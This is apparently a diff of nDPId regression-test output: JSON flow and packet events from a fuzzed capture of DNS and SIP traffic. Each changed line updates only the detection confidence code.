00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470141614,"flow_last_seen":1120470150621,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470336558,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2756,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1120469572981,"flow_last_seen":1120470268180,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":9723,"flow_avg_l4_payload_len":360,"midstream":0,"thread_ts_msec":1120470336558,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1120469572981,"flow_last_seen":1120470268180,"flow_idle_time":200000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":9723,"flow_avg_l4_payload_len":360,"midstream":0,"thread_ts_msec":1120470336558,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.168.1.2","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470344560,"flow_last_seen":1120470344560,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470344560,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2773,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1120470344560,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470344560,"pkt":"ADBUADRWAODtAW69CABFAABEavQAAIARTEHAqAECwKgBAQrVADUAMLAHdOoEAAABAAAAAAAAATEBMAEwAzEyNwdpTC1hZGRyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470344560,"flow_last_seen":1120470344560,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470344560,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2773,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.il-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":376,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470344560,"flow_last_seen":1120470344560,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470344560,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2773,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.il-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":377,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71,"global_ts_msec":1120470344562} 00425{"packet_event_id":1,"packet_event_name":"packet","packet_id":377,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"thread_ts_msec":1120470344560,"pkt":"AODtAW69ADBUADRWCABFAABbAACGAEARtz7AqAEBwKgBAgA1CtUAR5KDdOKAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470170646,"flow_last_seen":1120470170646,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470352381,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2640,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470158623,"flow_last_seen":1120470158625,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470352381,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2757,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00808{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470158623,"flow_last_seen":1120470158625,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470352381,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2757,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470171641,"flow_last_seen":1120470171641,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470352381,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2785,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470356585,"flow_last_seen":1120470356585,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470356585,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1120470356585,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470356585,"pkt":"ADBUADRWAODtAW69CABFAABIavkAAIARTFjAqAECwKgBAQrWADUANFcM0uIBAAABAAAAAAAABF9zaXAEX3VkcANzaXBpY3liZXJjaXR5AmJrAAAhAAE="} -00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470356585,"flow_last_seen":1120470356585,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470356585,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470356585,"flow_last_seen":1120470356585,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470356585,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":2,"flow_last_seen":1120470357579,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470357579,"pkt":"ADBUADRWAODtAW69CABFAABIavoAAIARTFfAqAECwKgBAQrWADUANFcM0uIBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":383,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470356585,"flow_last_seen":1120470357579,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470357579,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": 
{"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":383,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470356585,"flow_last_seen":1120470357579,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470357579,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":3,"flow_last_seen":1120470359581,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470359581,"pkt":"ADBUADTdAODtAW69CABFSQBIavMAAIARTFbAqAECwKgBAQrWADUANFcM0uIBAAABAAAAAAAABF9zaXAEX3VkcAxzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
-00883{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":384,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470356585,"flow_last_seen":1120470359581,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470359581,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00883{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":384,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470356585,"flow_last_seen":1120470359581,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470359581,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":385,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470361584,"flow_last_seen":1120470361584,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470361584,"l3_proto":"ip4","src_ip":"192.168.9.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1120470361584,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470361584,"pkt":"ADBUAEtWAODtAW69CABFAABIavwAAIARTFXAqAkCwKgBAQrWADUANFcM2uIBAAAAAAAAJXMABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470361584,"flow_last_seen":1120470361584,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470361584,"l3_proto":"ip4","src_ip":"192.168.9.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":386,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470356585,"flow_last_seen":1120470365590,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470365590,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":385,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470361584,"flow_last_seen":1120470361584,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470361584,"l3_proto":"ip4","src_ip":"192.168.9.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":386,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470356585,"flow_last_seen":1120470365590,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470365590,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2774,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00885{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":387,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470173644,"flow_last_seen":1120470173644,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470365590,"l3_proto":"ip4","src_ip":"192.168.37.115","dst_ip":"128.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"1":"Match by port"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":387,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470173644,"flow_last_seen":1120470173644,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470365590,"l3_proto":"ip4","src_ip":"192.168.37.115","dst_ip":"128.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":387,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470175647,"flow_last_seen":1120470179653,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470365590,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2758,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":387,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470373592,"flow_last_seen":1120470373592,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470373592,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2775,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1120470373592,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470373592,"pkt":"ADBUADRWAODtAW69CABFAABEav4AAIARTFfAqAECwKgBAQrXADUAMHoFquIAAAABAAAAAAAIATEBMAEwAzEyNwdpbi1hUWSWBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470373592,"flow_last_seen":1120470373592,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470373592,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2775,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-aqd?.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470373592,"flow_last_seen":1120470373592,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470373592,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2775,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"1.0.0.127.in-aqd?.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":388,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":2,"flow_last_seen":1120470373593,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470373593,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CtcAR1yBquKAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":388,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470373592,"flow_last_seen":1120470373593,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470373593,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2775,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 
